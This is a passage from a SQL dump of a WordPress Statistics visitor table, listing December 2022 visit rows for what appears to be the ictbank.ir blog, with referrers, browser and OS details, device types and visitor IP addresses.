(26339,'2022-12-05','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(26340,'2022-12-05','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.200.171.176','000',0,2,0),
(26341,'2022-12-05','http://ictbank.ir/blog','Chrome','OS X','105.0.0.0','desktop','Macintosh','','178.159.37.125','000',0,2,0),
(26342,'2022-12-05','http://ictbank.ir/blog','Firefox','OS X','94.0','desktop','Macintosh','','131.153.240.2','000',0,1,0),
(26343,'2022-12-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,2,0),
(26344,'2022-12-05','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','62.171.177.111','000',0,1,0),
(26345,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','107.0.0.0','desktop','Unknown','','54.189.230.128','000',0,1,0),
(26346,'2022-12-05','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','88.123.148.206','000',0,1,0),
(26347,'2022-12-05','http://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.53.138','000',0,2,0),
(26348,'2022-12-05','http://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.133.50','000',0,2,0),
(26349,'2022-12-05','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.90.43.9','000',0,1,0),
(26350,'2022-12-05','https://www.bing.com','Chrome','Linux','34.0.0.0','desktop','Unknown','','138.197.143.129','000',0,20,0),
(26351,'2022-12-05','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','125.212.225.132','000',0,2,0),
(26352,'2022-12-05','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,2,0),
(26353,'2022-12-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.177.129','000',0,2,0),
(26354,'2022-12-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(26355,'2022-12-05','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','84.239.49.230','000',0,5,0),
(26356,'2022-12-05','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.152.84','000',0,2,0),
(26357,'2022-12-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.53','000',0,2,0),
(26358,'2022-12-05','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','101.68.211.2','000',0,1,0),
(26359,'2022-12-06','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,18,0),
(26360,'2022-12-06','http://45.92.94.221/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.86.63','000',0,1,0),
(26361,'2022-12-06','http://45.92.94.221/blog/','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.94.159','000',0,1,0),
(26362,'2022-12-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(26363,'2022-12-06','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.30','000',0,1,0),
(26364,'2022-12-06','http://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(26365,'2022-12-06','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26366,'2022-12-06','https://www.google.com/','Firefox','Windows','107.0','desktop','Unknown','','202.176.124.18','000',0,1,0),
(26367,'2022-12-06','http://ictbank.ir/blog','Opera','Windows','89.0.0.0','desktop','Unknown','','198.244.193.213','000',0,2,0),
(26368,'2022-12-06','http://wikisonnati.com/blog','Firefox','Windows','105.0','desktop','Unknown','','185.213.154.213','000',0,2,0),
(26369,'2022-12-06','https://www.bing.com/','Edge','Windows','107.0.0.0','desktop','Unknown','','49.37.155.134','000',0,1,0),
(26370,'2022-12-06','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','107.179.20.158','000',0,2,0),
(26371,'2022-12-06','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26372,'2022-12-06','https://www.google.com/','Safari','OS X','15.0','desktop','Macintosh','','94.101.228.12','000',0,1,0),
(26373,'2022-12-06','http://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','5.178.2.83','000',0,1,0),
(26374,'2022-12-06','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.220.34.88','000',0,1,0),
(26375,'2022-12-06','http://ictbank.ir/blog/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.10','000',0,8,0),
(26376,'2022-12-06','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(26377,'2022-12-06','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(26378,'2022-12-06','http://45.92.94.221:80/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','3.236.16.72','000',0,1,0),
(26379,'2022-12-06','http://wikisonnati.com/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','109.106.137.188','000',0,2,0),
(26380,'2022-12-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(26381,'2022-12-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
(26382,'2022-12-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(26383,'2022-12-06','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','51.195.94.145','000',0,1,0),
(26384,'2022-12-06','http://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.97','000',0,1,0),
(26385,'2022-12-06','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','138.197.32.106','000',0,2,0),
(26386,'2022-12-06','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','90.0.0.0','desktop','Unknown','','91.202.232.208','000',0,2,0),
(26387,'2022-12-06','http://ns11.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.64','000',0,1,0),
(26388,'2022-12-07','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,5,0),
(26389,'2022-12-07','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.142.141.105','000',0,2,0),
(26390,'2022-12-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(26391,'2022-12-07','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(26392,'2022-12-07','http://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(26393,'2022-12-07','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','103.251.167.21','000',0,1,0),
(26394,'2022-12-07','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.74','000',0,1,0),
(26395,'2022-12-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,4,0),
(26396,'2022-12-07','http://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','76.72.172.170','000',0,2,0),
(26397,'2022-12-07','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,1,0),
(26398,'2022-12-07','https://www.linkedin.com/','Unknown','iOS','Unknown','mobile:smart','iPhone','','75.84.245.130','000',0,2,0),
(26399,'2022-12-07','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26400,'2022-12-07','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(26401,'2022-12-07','http://ictbank.ir/blog/index.php/category/os/linxu/oraclelinux/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.50','000',0,7,0),
(26402,'2022-12-07','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.170.101','000',0,3,0),
(26403,'2022-12-07','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(26404,'2022-12-07','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','67.205.36.8','000',0,2,0),
(26405,'2022-12-07','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','61.147.15.67','000',0,4,0),
(26406,'2022-12-07','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.105.7','000',0,1,0),
(26407,'2022-12-07','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.102.254','000',0,1,0),
(26408,'2022-12-07','http://design-arena.ir/blog','Firefox','Unknown','.','desktop','Unknown','','142.93.105.127','000',0,2,0),
(26409,'2022-12-07','http://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.146','000',0,2,0),
(26410,'2022-12-07','http://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.53.138','000',0,2,0),
(26411,'2022-12-07','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','5.135.152.155','000',0,1,0),
(26412,'2022-12-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(26413,'2022-12-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','107.191.63.227','000',0,1,0),
(26414,'2022-12-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26415,'2022-12-07','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','78.153.130.91','000',0,2,0),
(26416,'2022-12-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(26417,'2022-12-07','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','71.6.146.130','000',0,2,0),
(26418,'2022-12-07','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.142.131.55','000',0,2,0),
(26419,'2022-12-08','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(26420,'2022-12-08','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,2,0),
(26421,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.25','000',0,6,0),
(26422,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(26423,'2022-12-08','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26424,'2022-12-08','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.72.66','000',0,2,0),
(26425,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,2,0),
(26426,'2022-12-08','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(26427,'2022-12-08','http://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','114.218.173.251','000',0,4,0),
(26428,'2022-12-08','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','61.147.15.67','000',0,6,0),
(26429,'2022-12-08','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(26430,'2022-12-08','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.80','000',0,2,0),
(26431,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.42','000',0,4,0),
(26432,'2022-12-08','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.199.209.59','000',0,2,0),
(26433,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.22','000',0,1,0),
(26434,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.50','000',0,1,0),
(26435,'2022-12-08','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','139.99.62.131','000',0,1,0),
(26436,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,2,0),
(26437,'2022-12-08','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','23.229.113.138','000',0,3,0),
(26438,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.30','000',0,1,0),
(26439,'2022-12-08','http://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.121','000',0,1,0),
(26440,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.51','000',0,1,0),
(26441,'2022-12-08','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','212.142.140.81','000',0,1,0),
(26442,'2022-12-08','http://wikisonnati.com/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.167','000',0,1,0),
(26443,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.27','000',0,1,0),
(26444,'2022-12-08','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','217.39.83.193','000',0,1,0),
(26445,'2022-12-08','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.38','000',0,2,0),
(26446,'2022-12-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(26447,'2022-12-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.228','000',0,1,0),
(26448,'2022-12-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,2,0),
(26449,'2022-12-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26450,'2022-12-08','http://wikisonnati.com','Chrome','Windows','50.0.0.0','desktop','Unknown','','178.33.114.104','000',0,2,0),
(26451,'2022-12-08','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','20.50.197.163','000',0,2,0),
(26452,'2022-12-08','http://ictbank.ir/blog','Firefox','Windows','107.0','desktop','Unknown','','178.72.68.80','000',0,2,0),
(26453,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','52.0.0.0','desktop','Unknown','','54.91.185.125','000',0,2,0),
(26454,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.27','000',0,1,0),
(26455,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26456,'2022-12-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(26457,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','71.6.135.131','000',0,2,0),
(26458,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.25','000',0,3,0),
(26459,'2022-12-09','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.61','000',0,1,0),
(26460,'2022-12-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,3,0),
(26461,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(26462,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,4,0),
(26463,'2022-12-09','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.66.38','000',0,2,0),
(26464,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','5.188.62.21','000',0,2,0),
(26465,'2022-12-09','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(26466,'2022-12-09','https://www.bing.com/','Edge','Windows','108.0.0.0','desktop','Unknown','','117.198.97.158','000',0,1,0),
(26467,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.28','000',0,2,0),
(26468,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.32','000',0,8,0),
(26469,'2022-12-09','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','23.106.28.196','000',0,1,0),
(26470,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.33','000',0,1,0),
(26471,'2022-12-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,4,0),
(26472,'2022-12-09','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(26473,'2022-12-09','http://wikisonnati.com/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','109.106.137.188','000',0,2,0),
(26474,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.55.166','000',0,2,0),
(26475,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','22.0.0.0','desktop','Unknown','','45.143.201.87','000',0,1,0),
(26476,'2022-12-09','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.157.66','000',0,2,0),
(26477,'2022-12-09','http://ictbank.ir/blog/index.php/category/web-security/wordpress-web-security/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.40','000',0,7,0),
(26478,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.50','000',0,1,0),
(26479,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.55','000',0,2,0);
INSERT INTO `wp_statistics_visitor` VALUES
(26480,'2022-12-09','https://www.bing.com','Chrome','Windows','41.0.0.0','desktop','Unknown','','143.110.181.37','000',0,1,0),
(26481,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.222.235.4','000',0,1,0),
(26482,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','93.61.24.22','000',0,4,0),
(26483,'2022-12-09','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.38','000',0,1,0),
(26484,'2022-12-09','http://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.250','000',0,2,0),
(26485,'2022-12-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.118','000',0,1,0),
(26486,'2022-12-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(26487,'2022-12-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26488,'2022-12-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26489,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','5.135.152.155','000',0,3,0),
(26490,'2022-12-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(26491,'2022-12-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(26492,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','182.162.90.116','000',0,2,0),
(26493,'2022-12-09','http://ictbank.ir/blog','Sogou Explorer','Windows','Unknown','desktop','Unknown','','118.190.201.155','000',0,2,0),
(26494,'2022-12-09','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','139.170.202.55','000',0,1,0),
(26495,'2022-12-09','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26496,'2022-12-09','http://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26497,'2022-12-10','https://developer.mozilla.org/en-US/docs/Web/','Chrome','iOS','107.0.0.0','mobile:smart','iPhone','','20.121.131.52','000',0,6,0),
(26498,'2022-12-10','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(26499,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','75.0.0.0','desktop','Unknown','','178.159.37.11','000',0,1,0),
(26500,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,7,0),
(26501,'2022-12-10','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,4,0),
(26502,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','104.215.187.77','000',0,1,0),
(26503,'2022-12-10','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.184.240','000',0,2,0),
(26504,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','205.196.223.27','000',0,3,0),
(26505,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26506,'2022-12-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,2,0),
(26507,'2022-12-10','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(26508,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','28.0.0.0','desktop','Unknown','','118.166.219.72','000',0,2,0),
(26509,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(26510,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.202.249.172','000',0,2,0),
(26511,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.41','000',0,3,0),
(26512,'2022-12-10','https://www.bing.com','Chrome','Windows','37.0.0.0','desktop','Unknown','','46.101.150.34','000',0,1,0),
(26513,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.28','000',0,16,0),
(26514,'2022-12-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(26515,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','185.208.76.243','000',0,1,0),
(26516,'2022-12-10','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(26517,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.29','000',0,10,0),
(26518,'2022-12-10','https://www.google.com/','Firefox','Windows','107.0','desktop','Unknown','','185.37.160.6','000',0,1,0),
(26519,'2022-12-10','http://wikisonnati.com/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.90.90.194','000',0,2,0),
(26520,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26521,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.33','000',0,6,0),
(26522,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,2,0),
(26523,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.44','000',0,8,0),
(26524,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.218.236.80','000',0,1,0),
(26525,'2022-12-10','http://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','188.147.134.237','000',0,2,0),
(26526,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26527,'2022-12-10','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','185.46.8.135','000',0,2,0),
(26528,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.22','000',0,5,0),
(26529,'2022-12-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(26530,'2022-12-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.118','000',0,1,0),
(26531,'2022-12-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(26532,'2022-12-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(26533,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.52','000',0,12,0),
(26534,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.57','000',0,4,0),
(26535,'2022-12-10','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.42','000',0,9,0),
(26536,'2022-12-10','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(26537,'2022-12-11','http://design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.122','000',0,1,0),
(26538,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.35','000',0,6,0),
(26539,'2022-12-11','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(26540,'2022-12-11','http://wikisonnati.com/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.90.74','000',0,1,0),
(26541,'2022-12-11','http://wikisonnati.com/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.90.66','000',0,1,0),
(26542,'2022-12-11','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.90.160.122','000',0,2,0),
(26543,'2022-12-11','http://wikisonnati.com/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','109.106.137.188','000',0,2,0),
(26544,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.49','000',0,3,0),
(26545,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.34','000',0,4,0),
(26546,'2022-12-11','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,2,0),
(26547,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.31','000',0,4,0),
(26548,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.59','000',0,6,0),
(26549,'2022-12-11','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.21','000',0,5,0),
(26550,'2022-12-11','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(26551,'2022-12-11','http://baidu.com/','Bing Search','Android','6.0.0','mobile:smart','Mate 9','','180.163.220.5','000',0,1,0),
(26552,'2022-12-11','http://baidu.com/','Bing Search','Android','6.0.0','mobile:smart','Mate 9','','27.115.124.70','000',0,1,0),
(26553,'2022-12-11','http://baidu.com/','Bing Search','Android','6.0.0','mobile:smart','Mate 9','','27.115.124.101','000',0,1,0),
(26554,'2022-12-11','http://45.92.94.221/blog','Chrome','Linux','44.0.0.0','desktop','Unknown','','167.71.46.239','000',0,2,0),
(26555,'2022-12-11','http://www.ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.128.169','000',0,2,0),
